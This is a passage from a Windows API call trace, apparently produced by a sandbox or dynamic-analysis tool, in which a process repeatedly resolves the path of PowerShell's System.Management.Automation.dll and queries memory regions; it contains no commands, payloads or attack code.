lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.962] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.963] GetLastError () returned 0xcb [0044.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.964] GetLastError () returned 0xcb [0044.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.964] GetLastError () returned 0xcb [0044.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.965] GetLastError () returned 0xcb [0044.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.965] GetLastError () returned 0xcb [0044.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.965] GetLastError () returned 0xcb [0044.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.965] GetLastError () returned 0xcb [0044.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.970] GetLastError () returned 0xcb [0044.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.970] GetLastError () returned 0xcb [0044.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.970] GetLastError () returned 0xcb [0044.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.970] GetLastError () returned 0xcb [0044.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.970] GetLastError () returned 0xcb [0044.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d694, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.970] GetLastError () returned 0xcb [0044.971] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.981] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.990] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.991] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.062] GetLastError () returned 0xcb [0045.137] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.147] GetLastError () returned 0xcb [0045.299] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x5c3070 [0045.299] GetLastError () returned 0x0 [0045.299] GetLastError () returned 0x0 [0045.423] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.434] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.435] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.436] VirtualQuery (in: lpAddress=0x25c2c4, lpBuffer=0x25d2c4, dwLength=0x1c | out: lpBuffer=0x25d2c4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.464] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.464] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.464] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.464] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.464] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.464] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.465] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.466] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.467] VirtualQuery (in: lpAddress=0x25cc10, lpBuffer=0x25dc10, dwLength=0x1c | out: lpBuffer=0x25dc10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.486] GetLastError () returned 0xcb [0045.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.486] GetLastError () returned 0xcb [0045.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.486] GetLastError () returned 0xcb [0045.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.487] GetLastError () returned 0xcb [0045.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.494] GetLastError () returned 0xcb [0045.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.494] GetLastError () returned 0xcb [0045.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 